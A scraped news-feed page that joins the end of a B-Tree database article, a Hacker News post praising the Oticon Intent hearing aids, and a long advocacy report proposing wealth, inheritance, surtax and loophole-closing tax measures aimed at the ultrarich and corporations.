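lo = bisect.bisect_left(sorted_keys, 10)        # but range queries fall out naturally
hi = bisect.bisect_right(sorted_keys, 100)
print(sorted_keys[lo:hi])                       # keys in [10, 100] -> [42, 99]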

For large analytical queries scanning millions of rows, columnar storage (e.g., Parquet, ORC) outperforms B-Trees.

Comparison: a row store indexed by a B-Tree reads whole rows even when a query needs only a few columns; columnar formats read and compress each column separately, which is far more efficient for scans over millions of rows.

Examples:

  • Row storage (B-Tree): MySQL, PostgreSQL

  • Columnar storage: Parquet (used by Snowflake, BigQuery), ORC (used by Hive)

After 50+ years, B-Trees remain the dominant on-disk data structure because they:

  • Minimize disk I/O: High fanout reduces tree height

  • Balance automatically: Splits and merges keep all leaves at the same depth

  • Support range queries: Sorted keys and leaf-level links enable efficient scans

  • Work on any disk: Optimized for both HDDs (sequential I/O) and SSDs (block-level access)

Key insight: B-Trees match the constraints of disk storage. Since the smallest I/O unit is a block, B-Trees pack as much data as possible into each block. This simple idea—maximizing fanout to minimize height—makes databases fast.

When to use B-Trees:

  • Disk-based storage (database indexes)

  • Frequent reads and moderate writes

  • Range queries on sorted data

  • General-purpose OLTP workloads

When to consider alternatives:

  • Write-heavy workloads (LSM-Trees)

  • In-memory data (hash indexes, skip lists)

  • Analytical queries (columnar storage)

Every time you query your database and get a result in milliseconds, thank the B-Tree.

This article is based on Chapter 2 ("B-Tree Basics") of Database Internals: A Deep Dive into How Distributed Data Systems Work by Alex Petrov (O'Reilly, 2019).

Additional resources:

Books:

  • Petrov, A. (2019). Database Internals: A Deep Dive into How Distributed Data Systems Work . O’Reilly Media. ISBN: 978-1492040347

  • Knuth, D. E. (1998). The Art of Computer Programming, Volume 3: Sorting and Searching (2nd Ed.) . Addison-Wesley. ISBN: 978-0201896855

  • Graefe, G. (2011). Modern B-Tree Techniques . Now Publishers. ISBN: 978-1601984197

Thanks for reading!

If you found this deep-dive helpful, subscribe to m3mo Bytes for more technical explorations of databases, distributed systems, and data structures.

Have you worked with B-Trees or database indexes? What performance challenges have you faced? Share your experiences in the comments—I read and respond to every one.

  • What database systems have you worked with? (MySQL, PostgreSQL, MongoDB?)

  • Have you encountered B-Tree performance bottlenecks in production?

  • What index strategies have worked well for your workload?

  • Have you compared B-Trees to LSM-Trees for write-heavy workloads?

  • Any interesting query optimization stories with indexes?

Drop a comment below.

Discussion about this post

Ask HN: Hearing aid wearers, what's hot?

Hacker News
news.ycombinator.com
2025-11-24 02:25:39
Comments...
Original Article

I have worn hearing aids since childhood in the '90s. Moderate sloping to profound loss. Been through all the tech since the equalized analog era.

For a while now, like the last 15 to 20 years, since hearing aids went DSP, I had not been much impressed by each new generation. At the risk of sounding like a bit of an advertisement, that changed this year.

I have the new Oticon Intent. RIC style aid. They have some of the best spatial awareness I've experienced. They're capable of quite a lot of directionality - accelerometer and three microphones in each. I had to have the intensity of the directionality turned down a bit. It was startling me when I turned my head and I wasn't hearing things behind me enough. But that's at the expense of less signal due to more environmental noise.

The machine-learning based noise reduction is an improvement over the previous generations, too.

They have a music mode. It drops all the speech remapping and noise reduction and just makes it feel loud. It's some sort of perceptual algorithm: in my case as I turn up the volume it gets more and more treble, because only at the loudest volumes would I hear those high frequencies. All while being power limited at 95 dB SPL so I know I'm not blowing my ears. It's nice to not worry about if it's too loud.

Raising Taxes on the Ultrarich

Portside
portside.org
2025-11-24 02:22:55
Original Article

Summary

The public has supported raising taxes on the ultrarich and corporations for years, but policymakers have not responded. Small increases in taxes on the rich that were instituted during times of Democratic control of Congress and the White House have been consistently swamped by larger tax cuts passed during times of Republican control. This was most recently reflected in the massive budget reconciliation bill pushed through Congress exclusively by Republicans and signed by President Trump. This bill extended the large tax cuts first passed by Trump in 2017 alongside huge new cuts in public spending. This one-step-forward, two-steps-back dynamic has led to large shortfalls of federal revenue relative to both existing and needed public spending.

Raising taxes on the ultrarich and corporations is necessary for both economic and political reasons. Economically, preserving and expanding needed social insurance and public investments will require more revenue. Politically, targeting the ultrarich and corporations as sources of the first tranche of this needed new revenue can restore faith in the broader public that policymakers can force the rich and powerful to make a fair contribution. Once the public has more faith in the overall fairness of the tax system, future debates about taxes can happen on much more constructive ground.

Policymakers should adopt the following measures:

  • Tax wealth (or the income derived from wealth) at rates closer to those applied to labor earnings. One way to do this is to impose a wealth tax on the top 0.1% of wealthy households.
  • Restore effective taxation of large wealth dynasties. One way to do this would be to convert the estate tax to a progressive inheritance tax.
  • Impose a high-income surtax on millionaires.
  • Raise the top marginal income tax rate back to pre-2017 levels.
  • Close tax loopholes for the ultrarich and corporations.

Introduction

The debate over taxation in the U.S. is in an unhealthy state. The public is deeply distrustful of policymakers and doesn’t believe that they will ever put typical families’ interests over those of the rich and powerful. In tax policy debates, this means that people are often highly skeptical of any proposed tax increases, even when they are told it will affect only (or, at least, overwhelmingly) the very rich. People are also so hungry to see any benefit at all, no matter how small, that they are often willing to allow huge tax cuts for the ultrarich in tax cut packages if those packages include any benefit to them as well. The result has been a continued downward ratchet of tax rates across the income distribution. 1 This is a terrible political dynamic for U.S. economic policy, given the pressing national needs for more revenue.

As countries get richer and older, the need for a larger public sector naturally grows. 2 Yet the share of national income collected in taxes by the U.S. government has stagnated since the late 1970s. This has left both revenue and public spending in the United States at levels far below those of advanced country peers. 3 This stifling of resources available for the public sector is not only inefficient but has led to frustration over its inability to perform basic functions. The political root of this suppression of resources for the public sector is a series of successful Republican pushes to lower tax rates for the richest households and corporations. This attempt to use tax policy to increase inequality has amplified other policy efforts that have increased inequality in pre-tax incomes, leading to suppressed growth in incomes and declining living standards for low- and middle-income households and a degraded public sector. 4

In recent decades the dominant strategy for many on the center–left to combat the public’s tax skepticism is to pair tax increases with spending increases for programs that lawmakers hope will be popular enough to justify the taxes. This strategy has worked in the sense that some tax increases have been passed in the same legislation that paid for valuable expansions of income support, social insurance, and public investment programs in recent years. But this strategy has not stopped the damaging political dynamic leading to the sustained downward ratchet of tax revenue and the tax rates granted to the ultrarich and corporations. 5

Part of the problem with a strategy of trying to attach tax increases to allegedly more popular spending increases is that it takes time for spending programs to become popular. The Affordable Care Act (ACA), for example, was not particularly popular in the year of its passage but has survived numerous efforts to dislodge it and has seemingly become more popular over time. Conversely, the expanded Child Tax Credit (CTC) that was in effect in 2021 and cut child poverty in half only lasted a single year, so there was little organic public pressure on Congress to ensure it continued.

In this report, we suggest another strategy for policymakers looking to build confidence in the broader public that tax policy can be made fairer: Target stand-alone tax increases unambiguously focused on ultrarich households and corporations as the first priority of fiscal policy. The revenue raised from this set of confidence-building measures can be explicitly aimed at closing the nation’s fiscal gap (the combination of tax increases or spending cuts needed to stabilize the ratio of public debt to national income). 6 Once this gap has been closed with just highly progressive taxes, the public debate about the taxes needed to support valuable public investments and welfare state expansions should be on much more fruitful ground.

This approach takes seriously the work of scholars like Williamson (2017), who argue that the U.S. public is not rigidly “anti-tax.” Indeed, this public often views taxpaying as a civic responsibility and moral virtue. Yet they have become convinced that too many of their fellow citizens are not making a fair and adequate contribution. Part of this perception rests on underestimating the taxes paid by the poor and working people, but a good part of this perception also rests on the accurate impression that many rich households and corporations are not paying their fair share. Policy can change this latter perception, particularly if the policy is explicitly identified with ensuring that the rich and corporations—and only the rich and corporations—will see their taxes increase.

The rest of this report describes a number of tax policy changes that would raise revenue from the rich and corporations with extremely small (often zero) spillover into higher taxes for anybody else. It also provides rough revenue estimates of how much each could raise. It is not exhaustive, but it demonstrates that the nation’s current fiscal gap could certainly be closed with only taxes on the very rich. Making this policy agenda and target explicit could go a long way to restoring trust and improving the quality of the debate about taxes.

Targeting the ultrarich

The vast majority (often 100%) of the tax policy changes discussed below would only affect the taxes paid by the top 1% or above (those making well over $563,000 in adjusted gross income in 2024). Many of the taxes—and the vast majority of the revenue raised—will actually come from households earning well above this amount. We will be more specific about the incidence of each tax in the detailed descriptions below. The tax policy changes fall into two categories: increasing the tax rates the rich and ultrarich pay and closing the tax loopholes they disproportionately benefit from. We first present the tax rate changes, and we list them in declining order of progressivity.

Both the rate changes and the loophole closers disproportionately focus on income derived from wealth. By far the biggest reason why rich households’ tax contributions are smaller than many Americans think is appropriate has to do with rich households’ source of income. So much of these households’ income derives from wealth, and the U.S. federal tax system taxes income derived from wealth more lightly than income derived from work. If policymakers are unwilling to raise taxes on income derived from wealth, the tax system can never be made as fair as it needs to be.

Levying a wealth tax on the top 0.1% or above of wealthy households

The WhyNot Initiative (WNI) on behalf of Tax the Greedy Billionaires (TGB) has proposed a wealth tax of 5% on wealth over $50 million, with rates rising smoothly until they hit 10% at $250 million in wealth and then plateauing. With this much wealth, even a household making just a 1% return on their wealth holdings would receive an income that would put them in the top 1% of the income distribution. A more realistic rate of return (say, closer to 7%) would have them in the top 0.1% of income.

The $50 million threshold roughly hits at the top 0.1% of net worth among U.S. families, so this tax is, by construction, extremely progressive—only those universally acknowledged as extremely wealthy would pay a penny in additional tax. The WNI proposal also imposes a steep exit tax, should anybody subject to the tax attempt to renounce their U.S. citizenship to avoid paying it.

The Tax Policy Center (TPC) has estimated that the WNI wealth tax could raise $6.8 trillion in additional net revenue over the next decade, an average of $680 billion annually. In their estimate, the TPC has accounted for evasion attempts and the “externality” of reduced taxes likely to be collected on income flows stemming from wealth holdings. Despite accounting for these considerations, the $6.8 trillion in revenue over the next decade could completely close the nation’s current estimated fiscal gap.

A key consideration in the long-run sustainability of revenue collected through a wealth tax is how quickly the tax itself leads to a decline in wealth for those above the thresholds of the tax. If, for example, the tax rate itself exceeded the gross rate of return to wealth, wealth stocks above the thresholds set by the tax would begin shrinking, and there would be less wealth to tax over time. The Tax Policy Center’s estimate includes a simulation of this decumulation process, assuming an 8.5% rate of return. 7 It finds only very slow rates of decumulation.

Other simulation results (like those in Saez and Zucman 2019b) find faster decumulation for wealth taxes as high as this, but even their findings would still support the significant revenue potential of a wealth tax targeted at sustainability. Whereas the WNI wealth tax raises roughly 2.2% of GDP over the next 10 years, the Saez and Zucman (2019a) results highlight that over half this much could essentially be raised in perpetuity. 8

It is important to note that even if revenue raised from any given wealth tax came in lower than expected due to the decumulation of wealth, this decumulation is itself highly socially desirable. The wealth would not be extinguished. It would instead accumulate to other households throughout society. An analogy is carbon taxes targeted at lowering greenhouse gas emissions. If a carbon tax were implemented and the revenue it raised steadily fell over time, this would be a sign of success, as the primary virtue of such a tax is not the long-run revenue it can raise but the behavioral changes it can spur, such as switching to less carbon-intensive forms of energy generation and use.

The benefits from wealth decumulation could be profound. For one, much of the rise in wealth in recent decades has been the result of a zero-sum transfer of income claims away from workers and toward capital owners (Greenwald, Lettau, and Ludvigson 2025). To the degree that higher wealth taxes make these zero-sum transfers less desirable for privileged economic actors, the imperative to keep wages suppressed and profits higher will be sapped, leading to a broader distribution of the gains of economic growth.

Further, highly concentrated wealth leads naturally to highly concentrated political power, eroding the ability of typical families to have their voices heard in important political debates (Page, Bartels, and Seawright 2013). Studies show that popular support for democratic forms of government is weaker in more unequal societies, demonstrating that a greater concentration of wealth can lead to the erosion of democracy (Rau and Stokes 2024).

Converting the estate tax to a progressive inheritance tax

The estate tax in the United States currently only applies to estates of more than $11.4 million. At the end of 2025 it would have reverted to pre-2017 levels of roughly $7 million, but the Republican budget reconciliation bill passed in 2025 will raise it to a level more than twice as high starting in 2026—at $15 million. The 40% estate tax rate applies on values above these thresholds.

The estate tax threshold has been increased significantly since 2000, with changes in 2001, 2012, 2017, and 2025 all providing large increases. In 2000 the threshold for exemption was under $1 million, and the rate was 55%. If the 2000 threshold were simply updated for inflation, it would be roughly $1.3 million today, instead of $11.4 million. At this $1.3 million threshold and with a 55% rate, the estate tax would raise roughly $75 billion more in revenue this year than it is currently projected to. 9 In short, our commitment to taxing wealthy estates and their heirs has eroded substantially in recent decades.

Batchelder (2020) proposes a new tax on inheritances that would replace the estate tax. Batchelder’s inheritance tax would not fall on the total value of the estate, but simply on the portion of it inherited by individual heirs. Her proposal is to tax inheritances above a given lifetime threshold as ordinary income. Because the tax would be triggered by the lifetime level of gifts and inheritances, it cannot be avoided just by using estate planning to time these bequests and gifts. For a threshold of $1 million, the tax would raise roughly 0.35% of gross domestic product annually, or roughly $1 trillion over the next decade.

An inheritance tax is naturally more progressive than an estate tax. To see why, imagine an estate of $5 million that faced 2000-era estate tax rules. An estate tax would lower the value of the inheritance to all heirs by an amount proportional to the tax. Conversely, under an inheritance tax, the effective rate of the tax felt by heirs would be significantly different if the estate was spread among 10 heirs (each receiving $500,000 and, hence, not even being subject to the Batchelder inheritance tax that starts at $1 million) versus being spread among two heirs (each receiving $2.5 million and paying an inheritance tax). Fewer heirs for a given estate value imply a larger inheritance and, hence, a higher inheritance tax (if the inheritance exceeds the tax’s threshold).
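A quick sketch of that comparison, using assumptions of my own purely for illustration: a 2000-era estate tax with a $675,000 exemption and a 55% rate on the excess, and a Batchelder-style inheritance tax that applies a flat 37% ordinary-income rate to inheritances above $1 million (the actual proposal would run inheritances through the full progressive schedule):

```python
ESTATE_EXEMPTION, ESTATE_RATE = 675_000, 0.55        # 2000-era parameters (assumed)
INHERIT_THRESHOLD, ORDINARY_RATE = 1_000_000, 0.37   # Batchelder-style (simplified)

def estate_tax(estate):
    """Tax on the estate as a whole, regardless of how it is split."""
    return max(estate - ESTATE_EXEMPTION, 0) * ESTATE_RATE

def inheritance_tax(estate, n_heirs):
    """Tax on each heir's share above the lifetime threshold, summed."""
    share = estate / n_heirs
    return max(share - INHERIT_THRESHOLD, 0) * ORDINARY_RATE * n_heirs

estate = 5_000_000
print(f"estate tax (regardless of heirs): ${estate_tax(estate):,.0f}")
for heirs in (10, 2):
    print(f"inheritance tax with {heirs:>2} heirs: ${inheritance_tax(estate, heirs):,.0f}")
```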

Imposing a high-income surtax on millionaires

Probably the most straightforward way to tightly target a tax on a small slice of the richest taxpayers is to impose a high-income surtax. A surtax is simply an across-the-board levy on all types of income (ordinary income, business income, dividends, and capital gains) above a certain threshold. As such, there is zero possibility that lower-income taxpayers could inadvertently face any additional tax obligation because of it.

A version of such a high-income surtax was actually a key proposed financing source for early legislative versions of the Affordable Care Act. The bill that passed the House of Representatives included such a surtax. 10 This surtax was replaced with other revenue sources during the reconciliation process between the House and Senate versions.

One proposal is to enact a 10% surtax on incomes over $1 million. This would affect well under 1% of households (closer to 0.5%). Using data from the Statistics of Income (SOI) of the Internal Revenue Service (IRS), we find that roughly $1.55 trillion in adjusted gross income sat over this $1 million threshold among U.S. households in 2019. 11 A purely static estimate with no behavioral effects, hence, would argue that $155 billion annually (10% of this $1.55 trillion) could be raised from this surcharge. In tax scoring models (like that of the Tax Policy Center or the Joint Committee on Taxation), behavioral effects tend to reduce estimates roughly 25% below such static estimates. Applying such a discount, and allowing for growth in nominal incomes over the budget window, would still suggest that the revenue potential of a high-income surtax with a $1 million threshold could be roughly $1.5 trillion over the next decade.
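The back-of-envelope arithmetic looks like this; the 4% nominal growth assumption for over-threshold incomes is mine, chosen only to show how the static first-year figure scales into a 10-year score:

```python
base_agi = 1.55e12      # AGI above the $1M threshold (2019, in 2024 dollars)
surtax_rate = 0.10
growth, discount, years = 0.04, 0.25, 10   # growth assumption is illustrative

static_year_one = surtax_rate * base_agi
decade_static = sum(static_year_one * (1 + growth) ** t for t in range(years))
decade_scored = decade_static * (1 - discount)

print(f"static, first year: ${static_year_one / 1e9:,.0f}B")
print(f"static, ten years:  ${decade_static / 1e12:,.2f}T")
print(f"with 25% discount:  ${decade_scored / 1e12:,.2f}T")
```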

Raising the top marginal income tax rate back to pre-TCJA levels

During the Clinton and Obama administrations, the top marginal tax rate on ordinary income was increased to 39.6%. During the George W. Bush and the first Donald Trump administrations, it was reduced and currently sits at 37%. This lower marginal top rate would have expired at the end of 2025, but the Republican budget reconciliation bill, passed by Congress and signed by Trump in July 2025, ensured that it would stay at 37%.

In 2025 the bracket that this top tax rate applies to begins at $626,350 for single filers ($751,600 for joint filers). This covers well under 1% of taxpayers. If the bracket for the top tax rate were dropped to $400,000 and the rate were raised to 39.6%, the Tax Policy Center has estimated that this could raise roughly $360 billion over the next decade. Earlier in 2025, there were reports that Republicans in Congress were thinking about letting the top tax rate revert to the level it was at before the 2017 Tax Cuts and Jobs Act (TCJA). This was touted as members of Congress breaking with their party’s orthodoxy and actually taxing the rich. On the contrary, the new top marginal tax rate now applies to joint filers at an even lower level than pre-TCJA rates.

As can be seen in Table 1 , pushing the top marginal rate on ordinary income to pre-TCJA levels is one of the weakest tools we have for raising revenue from the rich. The reason is simple. A large majority of the income of the rich is not ordinary income; it is income derived from capital and wealth, and, hence, only changing the tax rate on ordinary income leaves this dominant income form of the rich untouched.

Corporate tax rate increases

In 2017 the TCJA lowered the top rate in the corporate income tax from 35% to 21%, and the 2025 Republican budget reconciliation bill extended that lower 21% rate. The 35% statutory rate that existed pre-TCJA was far higher than the effective rate actually paid by corporations. Significant loopholes in the corporate tax code allowed even highly profitable companies to pay far less than the 35% statutory rate.

But at the same time the TCJA lowered the statutory rate, it did little to reduce loopholes—the gap between effective and statutory rates after the TCJA’s passage remains very large. 12 Clausing and Sarin (2023) have estimated that each 1 percentage point increase in the top statutory tax rate faced by corporations raises over $15 billion in the first years of the 10-year budget window. Raising today’s 21% top rate back to the 35% rate that prevailed before the TCJA would, hence, raise roughly $2.6 trillion over the next decade.
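As a rough check on that figure, the sketch below assumes about $15.5 billion per percentage point in the first year and 4% nominal growth in the corporate tax base over the window; both numbers are my own illustrative assumptions, not Clausing and Sarin's:

```python
points = 35 - 21                  # restoring the pre-TCJA statutory rate
per_point_year_one = 15.5e9       # "over $15 billion" per point, per year (assumed)
growth, years = 0.04, 10          # assumed nominal growth in the tax base

year_one = points * per_point_year_one
decade = sum(year_one * (1 + growth) ** t for t in range(years))
print(f"year one: ${year_one / 1e9:,.0f}B   decade: ${decade / 1e12:,.2f}T")
```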

The immediate legal incidence of corporate taxes falls on corporations, the legal entities responsible for paying the taxes. However, the economic incidence is subject to more debate. The current majority opinion of tax policy experts and official scorekeepers like the Joint Committee on Taxation (JCT) is that owners of corporations (who skew toward the very wealthy) bear most of the burden of corporate tax changes. 13 But some small share of the corporate tax rate’s incidence is often assigned to workers’ wages, as there are some (speculative) reasons to think a higher corporate tax rate leads in the long run to lower wage income. The economic reasoning is that if higher corporate tax rates lead to less economywide investment in tangible structures, equipment, and intellectual property, then this could slow economywide productivity growth. This slower productivity growth could, in turn, reduce wage growth for workers.

However, newer research highlights that there are good reasons to think that corporate tax rate increases have zero—or even positive—effects on private investment in structures, equipment, and intellectual property. Brun, Gonzalez, and Montecino (2025, forthcoming) argue that once one accounts for market power (either in product or labor markets) of corporations, corporate taxes fall, in part, on nonreproducible monopoly rents. To provide an example, a large share of Amazon’s profits is due not just to the size of the firm’s capital stock but to its considerable monopoly power in many business segments. This market power allows the firm to charge higher prices than it could in competitive markets, and these excess prices represent a pure zero-sum transfer from consumers, not a normal return to investment.

Increasing taxes on these monopoly rents can reduce stock market valuations of firms and actually lower the hurdle rate for potential competitors assessing whether to make investments in productivity-enhancing capital. This can actually boost investment and productivity economywide, and if investment and productivity rise (or just do not fall) in response to corporate tax increases, this implies that none of the economic incidence of a corporate tax increase falls on anybody but the owners of corporations.

In short, despite some mild controversy, it seems very safe to assume that increases in the corporate income tax rate both are and would be perceived by the public as extremely progressive.

Closing tax loopholes that the ultrarich and corporations use

As noted above, it’s not just falling tax rates that have led to revenue stagnation in recent decades. There has also been an erosion of tax bases. Growing loopholes and increasingly aggressive tax evasion strategies have put more and more income out of the reach of revenue collectors. It goes almost without saying that the vast majority of revenue escaping through these loopholes and aggressive tax evasion strategies constitutes the income of the very rich and corporations.

These types of loopholes are unavailable to typical working families because their incomes are reported to the Internal Revenue Service. Typical working families rely on wage income, which is reported to the penny to the IRS, and families pay their legally obligated tax amount. Income forms earned by the ultrarich, however, often have very spotty IRS reporting requirements, and this aids in the evasion and reclassification of income flows to ensure the ultrarich are taxed at the lowest rates. 14 Shoring up tax bases by closing loopholes and engaging in more robust enforcement are key priorities for ensuring the very rich pay a fair and substantial contribution to the nation’s revenue needs.

Closing loopholes that allow wealth gains and transfers between generations to escape taxation

The wealthy use a number of strategies to escape taxation of the income they generate and to allow assets to be transferred to their heirs. Below we discuss three such strategies and provide a score for a consolidated package of reforms aimed at stopping this class of tax strategies—$340 billion over the next decade.

Ending the step-up in basis upon death or transfer of assets

This is best explained with an example. Say that somebody bought shares of a corporation’s stock in the early 1980s for $1 per share. They held onto it for decades until it reached $501 per share. Since they never realized this capital gain by selling the stock, they were never taxed on their growing wealth. Now, say that they transferred these stock holdings to their children decades later. Because it is no longer the original buyer’s property, it would not be assessed as part of an estate subject to the estate tax. If their children subsequently sold the stock, current law would allow a step-up in basis, which means the capital gain they earned from selling the stock would only be taxed on the gain over and above the $501 per share price that prevailed when they received the stock , not the original $1 per share price.

So, if children sold their stock gift for $501 per share, they would owe zero tax. And for the family as a whole, the entire (enormous) capital gain that occurred when the share appreciated from $1 to $501 is never taxed. This allows huge amounts of wealth to be passed down through families without the dynasty’s ever paying appropriate taxes, either capital gains taxes or estate taxes.

An obvious solution to this problem is simply to not grant the step-up in basis when the asset is transferred. That is, when the children receive the stock in the example above, any subsequent sale should be taxed on any capital gain calculated from the $1 originally paid for the stock. In the case above, the children would have had to pay a capital gains tax on the full value between $1 and $501 if they had sold the stock for $501.
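The arithmetic of the example, assuming (for illustration only) a 23.8% capital gains rate, the 20% top rate plus the 3.8% NIIT:

```python
CAP_GAINS_RATE = 0.238   # assumed: 20% top rate plus the 3.8% NIIT

def tax_on_sale(sale_price, basis, rate=CAP_GAINS_RATE):
    """Capital gains tax owed when shares are sold."""
    return max(sale_price - basis, 0) * rate

original_cost, value_at_transfer, sale_price = 1.0, 501.0, 501.0  # per share

# Current law: the heirs' basis is "stepped up" to the value at transfer.
with_step_up = tax_on_sale(sale_price, basis=value_at_transfer)
# Reform: the heirs keep the original $1 basis (carryover basis).
without_step_up = tax_on_sale(sale_price, basis=original_cost)

print(f"tax per share with step-up:    ${with_step_up:,.2f}")     # $0.00
print(f"tax per share without step-up: ${without_step_up:,.2f}")  # $119.00
```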

Besides raising money directly through larger capital gains values, ending the step-up in basis can also cut down on many tax engineering strategies that wealthy families undertake to avoid taxation. Estimates for the revenue that could be raised by enacting this change are quite varied, but they tend to sit between $15 billion and $60 billion in 2025. 15 We estimate this would raise $190 billion over the next decade.

An alternative solution getting at the same problem would be to make the death of a wealth holder a realizable event. Essentially, for the purposes of taxation, it would be assumed that all assets were sold by a wealth holder upon their death, and the appropriate rate of capital gains taxation would then be collected.

Making borrowing a realizable event

A related reform would make the pledging of any asset as collateral against a loan a realizable event. In the example above, the original holder kept the shares for decades without selling them, which raises an obvious question: how is this family financing its current consumption without liquidating any wealth? They could, of course, be earning labor income. But the very wealthy often finance current consumption by taking out loans and using the value of their wealth as collateral. So long as the interest rates on the loans are lower than the rate of return on the wealth being pledged as collateral, they can enjoy high and rising consumption and still see considerable wealth appreciation. This is a particularly useful strategy during periods of low interest rates (like most of the past 25 years) and for owners of newer corporations that are growing rapidly (think Jeff Bezos and Amazon during the 2000s). This use of debt as a strategy of avoiding capital gains realization has often been called the “Buy, Borrow, Die” strategy.
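A tiny illustration of the underlying arithmetic, with assumed numbers of my own: $100 million of appreciated stock returning 7% a year, and $2 million a year of consumption financed by borrowing at 3% against the shares:

```python
wealth, debt = 100e6, 0.0
RETURN, LOAN_RATE, ANNUAL_BORROWING = 0.07, 0.03, 2e6   # assumed figures

for year in range(10):
    wealth *= 1 + RETURN                                # untaxed appreciation
    debt = debt * (1 + LOAN_RATE) + ANNUAL_BORROWING    # consumption on credit

print(f"after 10 years: wealth ${wealth / 1e6:,.0f}M, debt ${debt / 1e6:,.0f}M, "
      f"net ${(wealth - debt) / 1e6:,.0f}M, capital gains tax paid: $0")
```

The household's net worth keeps climbing even as it spends freely, and no realization event, and therefore no capital gains tax, ever occurs.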

An obvious reform to stop this would be to force wealth holders to treat pledging an asset as collateral as a realization event for this asset. When the wealth holder goes to financiers to get loans and pledges their shares as collateral, the wealth holder would pay a capital gains tax on the difference in the value of the stock between when they originally bought it and the value the day it is pledged for collateral. The amount of revenue this would raise would be small in the grand scheme of the federal budget, roughly $60 billion over the next decade. But it would provide one more block to a common tax evasion strategy for the ultrarich, and this could show up in more revenue collected through other taxes.

Closing loopholes that erode estate or inheritance tax bases

Hemel and Lord (2021) identify estate planning mechanisms that reduce the base of the current estate and gift taxes, including the abuse of grantor retained annuity trusts (GRATs) and excessively preferential tax treatment of transfers within family-controlled entities. Under current law, wealthy individuals establishing a trust for their descendants may calculate the taxable gift amount of the trust by subtracting the value of any qualified interest. This qualified interest includes any term annuity retained by the grantor of the trust. The annuity is based on market interest rates prevailing when the trust was established. When interest rates are low, this becomes an extremely valuable deduction.

Hemel and Lord (2021) give the example of a grantor establishing a $100 million trust but retaining a two-year annuity payment of $50.9 million based on the 1.2% interest rate prevailing in 2021. This taxpayer would be able to subtract this annuity from their taxable gift calculation, effectively paying no gift tax. If the assets in the trust grew faster than 1.2%, then the trust would have assets left over after two years, and these could be passed to the beneficiaries free of any transfer tax (as these assets came from the trust, not the original grantor). If assets in the trust grew more slowly than this rate, then the trust would be unable to make its full final annuity payment, would be declared a failed trust, and would trigger no estate or gift tax consequences. In this case, the original grantor could simply try again to construct a short-term irrevocable trust that would succeed in transferring income to heirs without triggering a gift tax.
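The annuity arithmetic behind that example can be checked directly. Assuming annuity payments at the end of each of the two years (a simplification of mine), the retained annuity that zeroes out a $100 million trust at a 1.2% rate is about $50.9 million, and any growth above 1.2% passes to the heirs free of transfer tax:

```python
rate, trust_value, years = 0.012, 100e6, 2

# Present value of a two-year annuity of $1 at the prevailing 1.2% rate:
annuity_factor = sum(1 / (1 + rate) ** t for t in range(1, years + 1))
annuity_payment = trust_value / annuity_factor
print(f"retained annuity payment: ${annuity_payment / 1e6:.1f}M per year")
# -> about $50.9M, so the taxable gift (trust minus retained interest) is ~zero.

# Residue left for the heirs under different growth assumptions:
for growth in (0.012, 0.07):
    assets = trust_value
    for _ in range(years):
        assets = assets * (1 + growth) - annuity_payment
    print(f"asset growth {growth:.1%}: residue to heirs ${max(assets, 0) / 1e6:.1f}M")
```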

Hemel and Lord (2021) recommend repealing the law that allows for this deduction of qualified interest from gift or transfer taxes applying to GRATs. They also argue for reducing the preferential treatment of transfers within family-controlled entities. The full package of reforms to estate planning that they recommend would raise $90 billion over the next decade.

Closing the loophole from ambiguity between self-employment and net investment income

As part of the Affordable Care Act, a 3.8% tax was assessed on income above $200,000 for single filers ($250,000 for joint filers). If this income is earned as wages or self-employment income, this tax is paid through the Federal Insurance Contributions Act (FICA) or the Self-Employment Contributions Act (SECA) taxes. If the income is received as a dividend, interest payment, royalty, or other form of investment income, the tax is paid as a Net Investment Income Tax (NIIT). The clear intent is for income of all forms to be assessed this tax.

Somehow, however, some business owners (mostly those owning limited partnerships and S corporations—corporations with a limited number of shareholders who are required to pass through all profits immediately to owners) have managed to classify their income as not subject to FICA, SECA, or the NIIT. 16 A number of policy options could close this unintended gap and raise nontrivial amounts of revenue—roughly $25 billion in 2025. Importantly, the revenue collected by this loophole closing would go directly to the Medicare trust fund.

International corporate tax reform

Before the TCJA, the biggest loophole by far in the corporate income tax code was U.S. corporations’ ability to defer taxes paid on profits earned outside the United States. In theory, once these profits were repatriated, taxes would be levied on them. However, financial engineering meant that there was little need to repatriate these profits for reasons of undertaking investment or stock buybacks or anything else corporations wanted to do. 17 Further, corporations routinely lobbied for repatriation holidays, periods of time when they were allowed to repatriate profits at a reduced rate. One such holiday was passed by Congress and signed into law by George W. Bush in 2004.

Between 2004 and 2017, pressure for another such holiday ramped up as more and more firms deferred corporate taxes by holding profits offshore. The TCJA not only provided such a holiday for past profits kept offshore, it also made profits booked overseas mostly exempt from U.S. corporate taxes going forward. In essence, the TCJA turned deferral into an exemption.

This TCJA exemption of foreign-booked profits was subject to small bits of tax base protection. But they have been largely ineffective. The 2025 budget reconciliation bill would further exacerbate these problems, reducing taxes on foreign income even more.

Clausing and Sarin (2023) recommend a suite of corporate reforms that aims to level the playing field between firms booking profits in the United States versus overseas. Key among them would be to reform the Global Intangible Low-Taxed Income (GILTI) tax rate, a rate introduced in the TCJA, to ensure that financial engineering would not allow large amounts of corporate income earned by U.S.-based multinationals to appear as if they were earned in tax havens. 18

The GILTI is essentially a global minimum tax rate for U.S. multinationals. But the rate (10.5% in 2024 and 12.6% in 2025) is far too low to effectively stop this kind of tax haven-shopping for corporations, much lower than the 15% minimum rate negotiated by the OECD and agreed to by the Biden administration in 2022.

In addition, multinationals are currently allowed to blend all their foreign tax obligations globally and take credits for foreign corporate income taxes paid. So, taxes paid on a company’s actual manufacturing plant in, say, Canada, can count toward the GILTI contribution of a multinational, even if the company then uses financial engineering to shift most of its paper profits to tax havens like the Cayman Islands.

Raising the GILTI rate and applying it on a country-by-country basis would go a long way to preserving the base of the U.S. corporate income tax in the face of tax havens. The Clausing and Sarin (2023) suite of reforms would raise $42 billion in 2025.

Building up IRS enforcement capabilities and mandates

In 2022, the IRS estimated that the tax gap (the dollar value of taxes legally owed but not paid in that year) exceeded $600 billion. The richest households account for the large majority of this gap. The IRS in recent decades has lacked both the resources and the political support to properly enforce the nation’s tax laws and collect the revenue the richest households owe the country.

